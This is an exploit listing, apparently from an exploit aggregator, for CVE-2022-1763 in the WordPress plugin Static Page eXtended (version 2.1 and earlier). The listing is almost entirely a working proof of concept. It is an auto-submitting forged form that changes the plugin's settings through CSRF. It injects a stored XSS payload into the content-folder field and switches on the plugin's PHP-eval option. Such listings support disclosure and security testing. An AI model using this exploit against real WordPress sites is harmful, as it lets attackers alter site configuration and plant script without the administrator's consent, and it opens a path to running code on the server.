Exploit for Static Page eXtended <= 2.1 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1763

Name: Exploit for Static Page eXtended <= 2.1 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1763
Rating: 5 (65 reviews)

2022-05-23 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:BD3AFF73-078A-4E5A-B9E3-1604851C6DF8
<form id="test" action="https://example.com/wp-admin/options-general.php?page=jp-staticpagex.php&action=modifypluginoptions" method="POST">
    <input type="text" name="JPSPX_MODIFY_PLUGIN_OPTIONS" value="1">
    <input type="text" name="JPSPX_REPLACE_CONTENT_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_REPLACE_CONTENT_FOLDER" value='wp-content/staticpages/"autofocus onfocus=alert`XSS`//'>
    <input type="text" name="JPSPX_REDIRECT_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_INLINE_INCLUDES_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_EVAL_PHP_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_EVAL_PHP" value="on">
</form>
<script>
    document.getElementById("test").submit();
</script>